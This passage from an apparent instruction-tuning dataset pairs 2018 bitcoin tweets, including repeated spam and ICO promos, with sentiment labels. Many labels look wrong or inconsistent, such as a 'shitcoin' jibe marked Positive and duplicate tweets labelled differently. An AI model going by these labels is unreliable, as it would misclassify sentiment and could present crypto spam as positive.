2018 (31:28)\nUSD : 8608.67\nWght: 0.43\nBlk#: 514747\nSize: 1107.3 KB\nTXs: 3026\nPool: 363 (0.6 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": 
"Bitcoin will have a really big move soon and I don't think it will be pretty. Make sure you guys are sitting in nice profits.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "f95cc0f66da4f837449df758f41a5d732345088decf2a29ebafcd80bbf52c8aa/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I really wanna China vs USA financial war can fully on, I don't care who wins, but expect a huge pump in bitcoin, cuz we like chaos \ud83c\udf1a", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BradSherman did you tell him bitcoin is terror", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WeareThrivelabs #thrive #ico #ethereum #bitcoin\nWelcome to ICO project! My best recommendation for you! 
Participate now!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Blaming #bitcoin for #ransomware attacks is like #blaming the #dollar when a #bank is #robbed.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Spruke do you commission bitmojis with bitcoin god I'm old", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Crypto Collectibles Are Worthless Without a Websitehttps://news.bitcoin.com/crypto-collectibles-are-worthless-without-a-website/", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Elections bought by Bitcoin Billionaires, no issues?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.643,300\n1 Hour: -0.62 % | 24 Hours: -4.61 % | 7 Days: 5.03 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8641.01 / 7013.475\u20ac\n1 bitcoin-cash = $1001.13 / 812.567\u20ac\n1 ethereum = $532.798 / 432.445\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:09:51 2018 (0:10)\nUSD : 8600.79\nWght: 0.43\nBlk#: 514749\nSize: 4.4 KB\nTXs: 16\nPool: 55 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000005d9276e028d5d5bed13951c19ec762fd4b1b592cc01bb mined at height 514748.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000027de32b3c537e1d112a86ed648ee1662f9f72e00b39761 mined at height 514749.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#skyfchain\n\nSkyfchain is very unique concept. 
Invest now\n\n#ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8608.6", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I invented a currency better than #bitcoin or any #cryptocurrency it's live rhinos.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BitcoinCashBCH @Bitcoin @rogerkver you're just stupid...", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JoyceWhiteVance Bitcoin, you think?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "bitcoin, more like shitcoin, haha like comment subscribe", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\ud83c\udd71itcoin To The Ground: $8515.32 USD\nPrevious Price: $8665.9 USD\nPercentage Decrease: 1.738%\n#BTC #BITCOIN \u26d4\ud83d\ude22", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9563.39 --- Includes Sum of Forks, Core $8514.00 (89.03%) + Cash $990.86 (10.36%) + Gold $58.53 (0.61%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "please give me\n32yyeXCAqrxbKMvSDP9ymib64wJfB8GUbe\n\n#Bitcoin", "output": "Neutral"}, {"instruction": "Detect the 
sentiment of the tweet.", "input": "If you\u2019re not going to work on making Bitcoin cash again but some ICO bullshit, I\u2019m going to educate regulators to how to put you in jail.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@EricBalchunas @ETFcom they did a good job merging away from bitcoin in their holdings. I don't know how they did it.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8632.39.\nThe current price of BCash is $1001.13, or 0.116423 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Prediction: Satoshi comes out of hiding to talk shit about Bitcoin Cash. $BCH $BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aroundofshe why do they call it bitcoin if you can't eat it", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Getting more Bitcoin when trading only matters if your making enough to outweigh its price swings \ud83e\udd37\ud83c\udffe\u200d\u2642\ufe0f", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoinintmoney @ryanxcharles \"Bitcoin Cash is a scam\" is a scam.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "CryptoCompare Bitcoin price changed -2.02% to $8489.49 #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@EricBalchunas @ETFcom Nice switch from bitcoin in their holdings. 
They probably dropped it after futures got started? I'm guessing", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$1.001,130\n1 Hour: -1.08 % | 24 Hours: -5.20 % | 7 Days: 7.94 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TheFuNk_TV @bstategames I mean, there are physical bitcoin irl, but it's just not a practical or common thing.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Friday 23/3/2018 Retracement on Bitcoin Daydream Believer Low 8,429.88 (high 8.688.28)", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@OnWindowly Can I borrow to buy more Bitcoin cash?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TehJoeCow @derose Must respect Bitcoin because respect wamen.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8587.57 / 6970.101\u20ac\n1 bitcoin-cash = $995.605 / 808.082\u20ac\n1 ethereum = $529.844 / 430.047\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Wow...was on a Zoom with none other than Charlie Shrem, a bitcoin god!\n#whocares", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Friday 23/3/2018 Retracement on Bitcoin Whats Love got to do with it 8,403.12", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "SlideCoin is an Android app that allows you to earn bitcoin from your phone...please download app Slide Coin, open with code DUB879", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Getting real tired of Bitcoin's bipolar bitch ass. $BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JohnTitusRenzi2 Not at $2999 before Bitcoin miners drive it up to $9999", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Friday 23/3/2018 I dont care who your are where your from retracement on Bitcoin=low 8,341.28", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BDubbJr He got SUPER into bitcoin. He came back and started doing reviews", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Gonna wake up and buy an undisclosed (that means secret but dont worry it's not a lot) amount of bitcoin in the morning.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Looks like #bitcoin is forming an upsidedown Donald Trump!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JanKasparecArt @KeanuReeves_USA Nice work Broski! next up....Buddah n Bitcoin? ;)", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:25:18 2018 (15:27)\nUSD : 8421.41\nWght: 0.42\nBlk#: 514750\nSize: 820.7 KB\nTXs: 1670\nPool: 112 (0.0 MB)\n@dellisny\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Friday 23/3/2018 Low for Bitcoin done on this song=As Long As You Love Me, Backstreet Boys", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000000d7d77781d4eb0bacfaca1af23caf7e476b26375829499 mined at height 514750.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin Do not worry, the great Sal told us that 9k is the absolute and final bottom. It can never go under 9k!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1c4433fe7d5b80456690cd24b3294236d359899753146d6bb54b880621f1a9e3/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "403bccf9c8dd5e8452ba51a90801130c65b59174d2b950355d6cbe8d6dd0ca25/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTC broke down $8600. Lookin for a hard bounce from 8400, or $7300 is in play. 
#bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2008. The world was falling apart. 2018 the world is still falling apart. Care to predict what bitcoin\u2019s role will be?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MacroScope17 Complete mass manipulation. Without it bitcoin would be nowhere.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "If dow crashes be ready.... #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Two consecutive lower highs and lower lows.\nWe're in a downtrend again.\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just dropped a Bitcoin into the \"Feel Better Otis\" boot. #ChicagoFire", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-BAT AskRate: 0.00002380 #Bittrex #BAT $BAT #Basic Attention Token #altcoin #bitcoin #cryptocurrency\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8514.08 / 6910.453\u20ac\n1 bitcoin-cash = $979.052 / 794.647\u20ac\n1 ethereum = $521.758 / 423.484\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8428.79@bitstamp. High $9099.590. Low $8377.290. 
Market Cap $142.720 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8514.08\nEthereum:$525.827\nBitcoin Cash:$979.052\nLitecoin:$158.993\nRipple:$0.637571\nIOTA:$1.2709", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8514.08\nEthereum:$525.827\nBitcoin Cash:$979.052\nLitecoin:$158.993\nRipple:$0.637571\nIOTA:$1.2709", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004714 (-0.00000140) #BTC / 0.39587 (-0.02144) #USD. Market rank is 115. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002267 (+0.00000001) #BTC / 0.190338 (-0.00454) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0473071 (+0.00007240) #BTC / 401.192 (-5.08800) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003342 (-0.00000032) #BTC / 0.280647 (-0.00944) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00077814 (-0.00000636) #BTC / 6.53418 (-0.21354) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@michaelbatnick What is bitcoin ? 
Niagra falls ?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@crypto_lily @MichaelSuppo @boxmining @TheCryptoZombie @CryptoLeung Correction: Not Bitcoin Brothers but instead it's Crypto-Bit Brothers", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8477.23 as of Thu Mar 22 21:31:10 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8450.66", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin is testing the support zone \ud83e\uddd0\nIf this support zone is broke then next support is around $8k \ud83e\udd13\n#btc #trading #cryptotrading#crypto", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Marc_Brownstein Did he tell you about bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@shitposterchild @cryptostardust Corn is short for Bitcorn is slang for Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Blockchair @ivivekkm @nikzh @linuxi0n @Sachi_Miura #Bitcoin has future, #Bcash doesn't", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "woah big drop on #btc #bitcoin just now 8300 range #binance\n\n#altcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@khunFYP @btc_manager maybe because you're hysterical when someone calls bitcoin cash a scam", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@movementsjpg I wish I could but I have my money tied up in bitcoin and my future, sis. I\u2019m sorry. 
I hope you fine another way \ud83e\udd19\ud83c\udffd", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Why does everyone who likes bitcoin look like a gym teacher that takes it too seriously?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin was a good investment while it lasted", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoLeung So when inflation happens people will have no choice to turn to Bitcoin\ud83d\ude0e", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:36:21 2018 (11:03)\nUSD : 8411.70\nWght: 0.42\nBlk#: 514751\nSize: 706.2 KB\nTXs: 1250\nPool: 41 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8650.00 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000026d81defd2989c8d311898a4a4029d62fdcea219e3347e mined at height 514751.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Beanie Babies are the next Bitcoin don\u2019t @ me", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN IS AN ASSHOLE", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The #BitcoinPizza would be worth US$85,140,800.00 right now (down -6.16% in the last 24 hours): #Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ArmyStrang This is literally bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Weeeeeeeeeeeeeeeeeee $BTC #BITCOIN", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8450.62 / 6858.945\u20ac\n1 bitcoin-cash = $975.709 / 791.934\u20ac\n1 ethereum = $520.671 / 422.602\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "No deal room services at this time! #Blockchain #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So this is the plan. Spread some fake news when #bitcoin rises so all the fools sell and we collect\n#BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitdominion @BitcoinDojin @ErikVoorhees There\u2019s going to be bitcoin backed credit cards $mco and others, before you know it", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Ilovebitcoin because broken #bitcoin miners are easy to fix", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Dunnestar @ProfFaustus If I buy 1 bitcoin per day and HODL, is that useless?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ProfFaustus @haseebinc @lopp @naval How many more of your dead friend's @bitcoin are you going to sell?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Looks like bitcoin is in retrograde again", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", 
"input": "So we're dumping #Bitcoin because @binance (an alt exchange) got a letter from Japanese regulators... Seems legit. BTFD", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Please remind me never to predict BTC again \ud83d\ude48she\u2019s sefinately a girl, clearing PMS\u2019ing and pissing me off now .#Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "why dont care about bitcoin can i just broke it ill fix it tomorrow i think", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "My bf is playing Tokyo Xanadu now and he just made the excellent point that Yuuki absolutely fucking mined bitcoin out the ass", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The NSA Spied on Bitcoin Users \u2013 Leaked Documents by Snowden Reveal", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Volume Spike triggered for $ethusd Interval 1h #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Please remind me never to predict BTC again \ud83d\ude48she\u2019s definitely a girl, clearly PMS\u2019ing and pissing me off now .Time to grow a pair! 
#Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CobraBitcoin @Excellion @BitMEXResearch Why do you claim 'BCore altcoin is Bitcoin' on your site?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "WHAT ICO'S ARE YOU MOST LOOKING FORWARD TOO\n\nLet me know of some that you are looking at\n\n#Bitcoin #ICO's #ETHEREUM", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CRYPTOCURRENC Give responds by cutting taxes and increase spending, currency devalues bitcoin soars", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Time to start accepting taxes in #bitcoin @Cityofatlanta\u2014you'd be unlocked in no time ;)\n\n#crypto", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@lucamarra8 @thecryptofam $4M+ worth of XBT - Bitcoin Quanto Futures Contract - long position was liquidated, i.e. the position was lost.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin This is a great concept for the crypto community", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@patribotics I think you're right about bitcoin. It's overdue for some guidance anyway.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "In my heart, I believe bitcoin is ridiculous and that's dandy", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Headed to the strip club, yo. 
What part of the G-string do I put the Bitcoin in?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aliasvaughn This may be bitcoin bust which indirectly and directly is involved in Trump/Russia.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$8.2k #BTC #BITCOIN is enough dip for me STOP selling", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I would love to see Bitcoin Private listed on koinex. #whatsnextonkoinex", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Breaking News: Binance will be listing WAN( $WAN) soon #cryptocurrency #blockchain #bitcoin #crypto #btc #ico #eth #xrp #trading #CryptoNews", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "There is so much happening in #crypto We are literally changing the world right now #bitcoinminer #bitcoin #btc #bitcoinsfuture", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TheNvsibleHand Bitcoin is your gold and litecoin is your dollar. Plain and simple", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin and all is cool but have you invested in a person that turned out totally worthless.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I guess we're going to revisit the $8115 and $8150 pivots.\n\nGod help us if they don't hold. 
$BTC #BTC #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@marchmadness I\u2019d like somebody to check the refs PayPal, Bitcoin, wallet or whatever the hell they use after the game.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 0 satoshi per byte. \nBTC : $8399 / \u20ac6812 / \u00a35948 @ Block 514751. \nMarket Cap: 145.52B USD. #Bitcoin #\u30d3\u30c3\u30c8\u30b3\u30a4\u30f3", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Why have so many attempts to get any kind of significant tx volume on BCash failed?\n\nThe Great BCash Failing Debate - A Flatline", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8451.89 / 6859.976\u20ac\n1 bitcoin-cash = $972.339 / 789.198\u20ac\n1 ethereum = $517.33 / 419.89\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Who wants to fork bitcoin? This site is sold to him", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Who is selling bitcoin right now? 
Is there some negative headline or potential news on the horizon?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#MAPS has 1 new tx\n(\ud83d\udcc9 output: 0.00115192 BTC / 9.67 USD)\nFinal balance: 0.00000000 BTC / 0.00 USD\n#donation #bitcoin #cryptopaymon \ud83e\udd84\ud83d\uddff\ud83d\udc4d", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8421.92", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Trading crypto is a way of transferring money from the impatient to the patient.\n\n#cryptocurrency #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@The_GetawayGirl @fuzzlime Get sun then put on sun lotion buy bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What are the mechanisms/methods you usually use for predicting bitcoin value?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I stopped checking crypto prices, and r/bitcoin a while back... is everything back to normal yet or is shit still hitting the fan", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 03:54:01 2018 (17:40)\nUSD : 8406.46\nWght: 0.42\nBlk#: 514752\nSize: 1009.1 KB\nTXs: 1961\nPool: 44 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Right now i have no idea the price of Bitcoin. Many many hours ago it was 8560. My pediction is 8800, a moderare rally", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "How much price of @Bitcoin will go till July? 
#Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bitstein The truth hurts, whatever you call him...he\u2019s talking economics behind bitcoin. He is absolutely right.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000008167a540c3d094befe6c9543e2ece27071ab87641581c mined at height 514752.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "another night staring at a screen instead of sleeping \ud83d\ude0c u feel me? #bitcoin #teamnosleep", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I know this has to be fake but it\u2019s still hilarious. Bitcoin jokes amuse me because of the this is to stupid to be real but yet", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@humanifold @Blockstream @shesek Sorry, not interested in bitcoin. There are other better coins.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "bitcoin: dead \nkinzcash: alive", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DougKass What about all the bitcoin on the sidelines?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin duh", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Where have you been trading most lately? $crypto #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Well @Google caused a bear market for crypto. gg everyone. We let a cooperation have the ultimate power over all of us. 
